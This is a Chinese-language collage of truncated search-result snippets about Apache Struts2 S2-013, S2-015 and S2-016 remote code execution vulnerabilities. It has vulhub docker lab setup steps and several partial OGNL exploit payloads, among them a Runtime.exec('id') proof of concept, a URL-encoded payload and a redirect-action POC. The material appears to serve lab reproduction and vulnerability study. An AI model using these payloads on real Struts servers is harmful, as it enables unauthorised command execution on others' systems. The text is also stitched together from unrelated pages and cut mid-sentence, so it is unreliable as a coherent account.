一、参考网址: https://github.com/phith0n/vulhub/tree/master/struts2/s2-013 二、 影响版本: http://struts.apache.org/docs/s2-013.html 三、 漏洞介绍: 在Struts Blank应用程序中打开HelloWorld.jsp,并将以下参数添加到url / a标签之一: includeParams="all" 这样一来,这条线将会是这样的: (它也...
前提:准备好docker环境,下载好vulhub,进入目录 ,开始复现漏洞 docker-compose build//可选 docker-compose up -d 完成试验后,记得删除漏洞环境哦~~ docker-compose down docker system prune -a -f//可选 简单访问一下,说明 Struts2S2-013 远程代码执行漏洞环境搭建成功了 解压war包,查看index.jsp,确实是 超...
受影响版本:低于Struts 2.3.14.2 官方在修复S2-012和S2-013的时候只是禁用了%{exp}这种方式,${exp}仍然有效,从而导致远程代码执行。 另外值得一提的是,官方在此次漏洞之后删除了allowStaticMethodAccess的set方法,之前所有的exp将不再有效。不过kxlzx大牛又提出了新的exp实现方法,后面给出exp。 八、S2-015 受影响...
在放置参数的过程中会将参数进行OGNL渲染,造成任意命令执行漏洞。 任意命令执行POC: ${(#_memberAccess["allowStaticMethodAccess"]=true,#a=@java.lang.Runtime@getRuntime().exec('id').getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[50000]...
cd vulhub/struts2/s2-013 docker-compose up -d 访问http://192.168.146.158:8013 3 漏洞复现 访问url,构造一个恶意的payload并发送。 代码语言:javascript 复制 /?a=%24%7B%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime%28%29.exec%28%27ec...
靶场地址: https://www.mozhe.cn/bug/detail/S0NiS2JMeTZUTVg3RXdMYzdqWTBQUT09bW96aGUmozhe 漏洞编号...
S2-013 存在于URL和Anchor Tag的includeParams属性中的漏洞允许远程执行命令 S2-014 通过在URL和Anchor Tag中强制插入参数引入的漏洞允许远程命令执行,会话访问和操作以及XSS攻击 S2-015 由通配符匹配机制引入的漏洞或OGNL Expression的双重评估允许远程命令执行。
Struts S-016漏洞原因是action的值redirect和redirectAction没有正确过滤,导致可以执行任意代码,如系统命令、上传、下载文件等。利用POC: POC1: 复制 http://127.0.0.1/Struts2/test.action?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']...
此后还出现过S2-013利用struts2标签执行ognl的方式,但是这些漏洞都相对鸡肋,影响范围也就大打折扣了。 事实上struts2框架底层是利用OGNL表达式来实现的,然而OGNL表达式的功能过于强大,导致可以直接调用java静态方法。但是官方为了防止在OGNL表达式中直接调用java静态方法,它在OGNL上下文中内置了几个命名对象。例如,#_memberA...
S2-013的漏洞分析:http://www.freebuf.com/vuls/9757.html Struts2最近几个漏洞分析&稳定利用Payload: http://www.freebuf.com/articles/web/25337.html 希望Struts官方能在爆出漏洞的第一时间完美的堵上….. 另外关于S2-020:http://sec.baidu.com/index.php?research/detail/id/18 ...